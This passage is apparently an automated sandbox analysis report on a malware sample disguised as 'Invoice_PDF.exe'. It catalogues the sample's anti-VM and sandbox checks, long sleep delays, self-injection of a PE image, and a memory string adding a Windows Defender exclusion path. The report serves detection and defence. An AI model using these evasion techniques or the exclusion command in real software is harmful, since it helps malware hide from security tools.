                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E28748 push 8802EC9Eh; iretd 0_2_02E2874D
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E21C67 push ebx; iretd 0_2_02E21C7A
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E21C7C push ebx; iretd 0_2_02E21C7A
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09143267 pushad ; ret 0_2_0914326D
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_0922422D push FFFFFF8Bh; iretd 0_2_0922422F
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_00ED72C2 push esi; iretd 3_2_00ED72C9
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_00ED5076 push bx; ret 3_2_00ED507D
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_013997B0 pushad ; ret 3_2_013997B1
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01769460 push ss; retf 3_2_01769477
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017ECF71 push esp; iretd 3_2_017ECF7D
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.91118342624
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.304a634.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 5136Thread sleep time: -35736s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 2564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6460Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464Thread sleep count: 1903 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464Thread sleep count: 7944 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWindow / User API: threadDelayed 1903Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWindow / User API: threadDelayed 7944Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 35736Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01399DF0 LdrInitializeThunk,3_2_01399DF0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeMemory written: C:\Users\user\Desktop\Invoice_PDF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exeJump to behavior
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
